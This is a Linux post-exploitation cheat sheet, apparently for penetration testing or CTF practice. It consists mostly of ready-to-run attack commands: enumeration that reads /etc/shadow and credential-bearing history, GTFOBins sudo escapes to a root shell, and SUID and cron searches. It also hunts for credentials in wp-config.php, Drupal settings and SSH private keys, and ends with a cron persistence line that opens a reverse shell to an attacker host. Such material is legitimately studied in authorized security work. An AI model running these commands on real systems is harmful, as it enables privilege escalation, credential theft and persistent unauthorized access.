Linux Post-Exploitation
Basic Enumeration
| Command | Description |
|---|---|
whoami | Current user. |
id | User ID, group ID, and supplementary groups. |
hostname | System hostname. |
uname -a | Kernel version and architecture. |
cat /etc/os-release | OS distribution and version. |
cat /etc/passwd | List all system users. |
cat /etc/shadow | Password hashes (requires root). |
ls /home | List home directories. |
ss -tulnp | Listening ports and services. |
netstat -antp | Active connections and listening ports. |
ifconfig / ip a | Network interfaces and IPs. |
arp -a | ARP table - discover other hosts on the network. |
route -n / ip route | Routing table. |
env | Environment variables (may contain credentials). |
history | Command history (may reveal credentials). |
cat ~/.bash_history | Bash history file. |
Privilege Escalation - sudo
| Command | Description |
|---|---|
sudo -l | List commands the current user can run as root. |
sudo -u root <command> | Run a specific command as root. |
GTFOBins - Common sudo Escalations
| Binary | Command to get root shell |
|---|---|
find | sudo find . -exec /bin/bash \; -quit |
vim | sudo vim -c ':!/bin/bash' |
python | sudo python -c 'import os; os.execl("/bin/bash", "bash", "-p")' |
python3 | sudo python3 -c 'import os; os.execl("/bin/bash", "bash", "-p")' |
less | sudo less /etc/passwd then !/bin/bash |
more | sudo more /etc/passwd then !/bin/bash |
awk | sudo awk 'BEGIN {system("/bin/bash")}' |
nmap | sudo nmap --interactive then !sh |
perl | sudo perl -e 'exec "/bin/bash";' |
ruby | sudo ruby -e 'exec "/bin/bash"' |
Privilege Escalation - SUID Binaries
| Command | Description |
|---|---|
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null | Find all SUID binaries. |
find / -perm -u=s -type f 2>/dev/null | Alternative SUID search. |
Check found binaries on GTFOBins for SUID exploitation techniques.
Privilege Escalation - Writable Files & Cron
| Command | Description |
|---|---|
cat /etc/crontab | System-wide cron jobs. |
ls -la /etc/cron.* | Cron directories (daily, hourly, weekly). |
find / -path /proc -prune -o -type f -perm -o+w -print 2>/dev/null | World-writable files. |
./pspy64 | Monitor running processes without root (detect cron jobs). |
Credential Hunting
| Command | Description |
|---|---|
find / -name "*.conf" -o -name "*.config" -o -name "settings.php" 2>/dev/null | Find configuration files. |
find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null | Broader config file search. |
grep -r "password" /var/www/ 2>/dev/null | Search for passwords in web files. |
cat /var/www/html/*/sites/default/settings.php | Drupal database credentials. |
cat /var/www/html/wordpress/wp-config.php | WordPress database credentials. |
find / -name "id_rsa" 2>/dev/null | Find SSH private keys. |
find / -name "*.bak" -o -name "*.old" 2>/dev/null | Backup files that may contain credentials. |
Persistence - Linux Cron
# Add a cron job that runs a reverse shell every minute
(crontab -l 2>/dev/null; echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/<kali_IP>/<port> 0>&1'") | crontab -